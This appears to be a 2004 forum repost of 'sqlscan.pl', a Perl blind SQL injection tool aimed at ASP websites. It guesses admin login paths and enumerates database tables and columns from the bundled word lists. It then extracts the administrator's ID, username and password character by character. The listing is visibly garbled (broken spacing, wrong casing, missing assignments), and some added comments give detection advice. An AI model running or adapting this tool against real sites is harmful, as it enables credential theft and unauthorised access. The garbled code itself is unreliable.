SQLSCAN.PL
Submitted by Superhei On 2004, July 8, 2:17 Am. My DD
#! / usr / bin / perl
#Codz by black 嘿 black
#Thx Mix
$ | = 1;
Use IO :: Socket;
PRINT "=================================================================================================================================================== ======================== / n ";
Print "The SQLFORM-FIND SCRIPT CODZ by Black
Print "Our Team: www.cnse8.com / n";
Print "My Home: XYHACK.91I.NET / N";
PRINT "=================================================================================================================================================== ======================== / n ";
Print "Usage: SQL.EXE 127.0.0.1 80 /test/wenxue/readArticle.asp?id=3 test success / N";
Print "---------------------------------------------- ----------------------- / n ";
IF ($ # argv <1)
IF ($ # argv> 1) {
$ Host = $ argv [0];
$ port = $ argv [1];
$ WAY = $ argv [2];
$ Judge = $ Argv [3];
Open (DB, 'SQLFROM.TXT') || DIE "can't open splfrom.txt."
@Form =
Close (DB);
Open (l, 'lines.txt') || DIE "can't open lines.txt."
@lines =
Close (L);
Open (lg, 'login.txt') || DIE "can't open login.txt."
@Login =
CLOSE (LG);
Foreach $ log (@login) {
CHOMP $ LOG;
@ RES = STR1 ();
Foreach $ check (@res) {
($ HTTP, $ CODE, $ blah) = split (/ /, $ check);
IF ($ code == 200) {
Print "Kaka !! Find the login: http:// $ host $ way1 $ log / n";
}
}
}
Foreach $ sqlfrom (@form) {
CHOMP $ SQLFROM;
$ line = "*";
@ res = Str ();
@ Num = grep / $ judge /, @res;
$ SIZE = @ Num;
IF ($ SIZE> 0) {
Print "/ nkaka !! Find the SQLFROM IS / U / A / A $ SQLFROM / E: / N";
Foreach $ line1 (@lines) {
CHOMP $ LINE1;
$ line = $ line1;
@ res = Str ();
@ Num = grep / $ judge /, @res;
$ SIZE = @ Num;
IF ($ SIZE> 0) {
Print "/ a $ line1 / n";
}
}
}
}
Print "/ a / a / ninput the SQLFORM of Admin! / N $ SQLFORM ="; $ SQLFORM =
Print "$ ID ="; $ IDS =
Print "$ usrname ="; $ usrnames =
Print "$ Password ="; $ Passwords =
Print "/ n / nnow, start to crack! please wait ... / n / n";
#under here is sql words
$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20 $ IDS =";
$ PATH2 = ")"
$ ID = CRACKINT ();
Print "/ n / nsuccessful, the id of the first admin's ID is / a $ ID ./N";
$ PATH1 = "% 20D% 20exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEN ($ Passwords) ="
$ PATH2 = "% 20And% 20 $ IDS = $ ID)";
$ len = crackint ();
Print "/ N / NSuccessful, The Len of Admin $ Password IS / A $ LEN ./N/N";
$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEFT ($ Passwords,";
$ PATH2 = ") = '";
$ PATH3 = "'% 20and% 20 $ IDS = ID)"; @password = crackchar ();
Print "/ N / NSuccessful, The Admin's Password IS / A / A @ Password ./n";
$ PATH1 = "% 20D% 20exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEN ($ usernames) ="
$ PATH2 = "% 20And% 20 $ IDS = $ ID)";
$ len = crackint ();
Print "/ N / NSuccessful, The Len of Admin's Name is $ LEN ./n/n";
$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEFT ($ usrnames,";
$ PATH2 = ") = '";
$ PATH3 = "'% 20And% 20 $ IDS = ID)";
@Username = crackchar ();
Print "/ n / nsuccessful, the admin's username is / a / a @ username ./n/n";
Print "Kaka !! / A / A / You can use / NUSERNAME: @ username / npassword: @ password / nto login test! / r / n";
# crackint - boolean-based blind inference of one integer value.
# Sends one request per candidate in 1..100 (the dictionary below), with a
# fixed 1 s pause between probes, and treats a response that contains the
# caller-supplied $judge marker as "condition true"; the first such
# candidate is returned.  Reads the globals $PATH1/$PATH2 (the clause the
# candidate is spliced into), $WAY, $host and $judge set by the caller.
# Defender note: the traffic signature is a run of near-identical GETs to
# the same URL that differ only in one numeric token of the query string,
# at roughly one request per second - easy to spot in access logs or a
# per-client request-rate rule.  Parameterised queries on the server side
# remove the condition this loop depends on entirely.
Sub crackint {
@ DIC = (1..100);
For ($ I = 0; $ i <@dic; $ i )
{
# Splice the candidate between the two fixed clause fragments.
MY $ PATH = $ PATH1. $ DIC [$ I];
MY $ PATH = $ PATH. $ PATH2;
# Raw HTTP/1.0 request; Referer and Host echo the target itself.
$ REQ = "Get $ WAY $ PATH HTTP / 1.0 / R / N".
"REFERER: http:// $ host $ way / r / n".
"Host: $ Host / N / N";
Print "$ DIC [$ I]."
# Fixed pacing between probes.
Sleep (1);
@IN = SOCK ($ REQ);
# A line matching $judge is the "true" oracle for this probe.
@n = grep / $ judge /, @IN;
$ SIZE = @ Num;
IF ($ SIZE> 0) {
RETURN $ DIC [$ I];
Last;
}
}
}
# crackchar - boolean-based blind inference of a string, one position at
# a time.  For each position $j (1 .. $g; $g is supplied from outside this
# sub) it walks a candidate alphabet of digits, letters and URL-encoded
# punctuation, appends each candidate to the already-accepted prefix $PWS,
# and keeps the first candidate whose response contains $judge.  Uses the
# globals $PATH1/$PATH2/$PATH3, $WAY, $host and $judge set by the caller.
# The three substitutions at the end decode the %2b / %25 / %26 escapes
# that were used in the alphabet so the returned string is plain text.
# Defender note: recovering each character costs the target one request per
# alphabet entry (roughly one per second, see Sleep below), so a single
# credential produces hundreds of requests that differ only in a short
# trailing token of the query string - rate limiting and alerting on
# repeated requests to one parameter are effective controls, and
# parameterised queries remove the oracle.
Sub crackchar {
MY $ PWS;
My @ DIC11 = (0..9);
my @ DIC12 = (a..z);
My @ DIC13 = (a..z);
# Punctuation candidates; some are URL-encoded so they survive in a GET.
MY @ special = QW (`~! @ # $% 25 ^% 26 * / (/) _% 2b = - {} []:"; <> |,. / /);
My @ special2 = qw (`~! · # ¥% ... - * () - - = {} []:"; '"│,. /, <>');
# Outer loop: string position; inner loop: candidate character.
My @dic = (@ DIC11, @ DIC12, @ DIC13, @ Special, @ special2); for ($ j = 1; $ j <= $ g; $ j )
{
For ($ I = 0; $ i <@dic; $ i )
{
# Accepted prefix plus the candidate under test.
MY $ key = $ PWS. $ DIC [$ I];
MY $ PATH = $ PATH1. $ J;
MY $ PATH = $ PATH. $ PATH2;
MY $ PATH = $ PATH. $ key;
MY $ PATH = $ PATH. $ PATH3;
$ REQ = "Get $ WAY $ PATH HTTP / 1.0 / R / N".
"REFERER: http:// $ host $ way / r / n".
"Host: $ Host / N / N";
Print "$ DIC [$ I]."
# Fixed pacing between probes.
Sleep (1);
@IN = SOCK ($ REQ);
# A line matching $judge means this candidate was accepted.
@n = grep / $ judge /, @IN;
$ SIZE = @ Num;
IF ($ SIZE> 0) {
$ TH = $ j.th;
Print "/ NSuccessful, The $ th Word of The Char IS $ DIC [$ I] / N";
# Extend the accepted prefix and move to the next position.
$ PWS = $ PWS. $ DIC [$ I];
Last;
}
}
}
# Undo the URL-encoding used in the candidate alphabet.
$ PWS = ~ s //% 2b // / ig;
$ PWS = ~ S / /% 25 //% / IG;
$ PWS = ~ s //% 26 // & / ig;
Return $ PWS;
}
# STR - one probe for the table/column-name enumeration pass.  Appends an
# existence clause built from the globals $line (candidate column, or "*")
# and $SQLFROM (candidate table) to the target URL $WAY and sends it via
# SOCK(); the caller greps the returned lines for $judge.  Relies on the
# globals $WAY, $Host, $line and $SQLFROM set before the call.
# Defender note: the request carries a non-standard "Referr:" header and an
# empty "Cookie:" header, which are distinctive artefacts when reviewing
# access or WAF logs for this tool.
SUB STR {
$ PATH = "% 20And% 20exists (SELECT% 20". $ line. "% 20FROM% 20 $ SQLFROM)";
# Raw HTTP/1.0 request, no TLS; header spelling is as the author wrote it.
$ REQ = "get $ WAY $ PATH HTTP / 1.0 / N".
"Host: $ Host / N".
"Referr: $ Host / N".
"Cookie: / n / n";
SOCK ($ REQ);
}
# str1 - one forced-browsing probe for the login-page discovery pass.
# Derives $WAY1 as a prefix of the target URL $WAY (the intent appears to be
# dropping the final path segment, but the split delimiter and $SS are not
# resolvable from this copy of the listing - confirm before relying on it),
# then requests $WAY1 followed by $log, the current entry from login.txt.
# The caller treats an HTTP 200 status as a hit.  Relies on the globals
# $WAY, $Host, $log and $I set before the call.
# Defender note: this is plain path guessing; the same "Referr:" / empty
# "Cookie:" header pair as in STR() marks these requests in server logs.
SUB str1 {
@ s = split (, $ WAY);
$ S = @ s;
$ s = @ s [$ I-1];
$ D = Length ($ SS);
$ E = Length ($ WAY);
# Keep the leading part of the URL, trimming $D characters from the end.
$ WAY1 = Substr ($ WAY, 0, $ E- $ D);
$ REQ = "GET $ WAY1 $ log http / 1.0 / n".
"Host: $ Host / N".
"Referr: $ Host / N".
"Cookie: / n / n";
SOCK ($ REQ);
}
# Sock - sends one raw HTTP request and returns every response line.
# Opens a fresh plaintext TCP connection to the globals $Host:$port for
# each call (no TLS, no timeout), writes $REQ verbatim, reads until the
# server closes, then closes the socket.  Dies if the connection cannot be
# established; errors from print/close are not checked.
# Defender note: one new TCP connection per probe means the tool's activity
# shows up as many short-lived connections from a single source, in
# addition to the request-level signature described in the callers.
Sub Sock {
MY ($ REQ) = @_;
MY $ Connection = IO :: Socket :: inet-> new (proto => "tcp",
Peeraddr => $ Host,
Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";
# Request is written as-is; the caller is responsible for its framing.
Print $ Connection $ Req;
# Read the whole response, headers included, as a list of lines.
My @res = <$ connection>;
CLOSE $ Connection;
Return @res;
}
# usage - interactive fallback that prompts for the target host, URL and
# judge word when too few arguments are given.  The right-hand sides of the
# three assignments are missing in this copy of the listing, so the
# statements are incomplete as shown; note that $port is not prompted for
# here and would remain unset on this path.
Sub usage {
Print "/ Ninput The Host Info! / N $ Host ="; $ host =
Print "$ WAY ="; $ WAY =
Print "/ Input the Judge Words! / N $ JUDGE ="; $ JUDGE =
}
=================== =============================================================================================================================
SQLFROM.TXT:
admin
User
Users
Userinfo
Admin_UserInfo
Password
Adminuser
Manboard
Diaryuseruser
PWD
T_User
user
administrator
Lines.txt:
id
UserID
Username
USR
admin
Name
User
Userpwd
Password
PWD
Passwd
PSWORD
PASS
PWS
PWA
User_id
User_name
User_pass
admin_id
admin_name
Admin_pass
Admin_password
U_ID
U_NAME
U_password
AUID
APWD
Name
password
Login.txt:
Pass.asp
PASSWORD.ASP
Psd.asp
UserName / login.asp
Username / admin.asp
Denglu.asp
Login / admin.asp
Login / login.asp
admin_login.asp
Login_Admin.asp
UserLogin.asp
User.asp
User / login.asp
Admin / admin.asp
Admin / login.asp
admin.asp
Login.htm
admin_login / admin.asp
Login_ADMIN / LOGIN_ADMIN.ASP
Login.asp
AdmPast.asp
admin_login.asp
adminLogin.asp
Managenews / index.htm
Admin / admin_login.asp
Admin_index.asp
Adminn / Index.asp
Admin / AdminLogin.asp
Admin / Default.asp
Manage / login.asp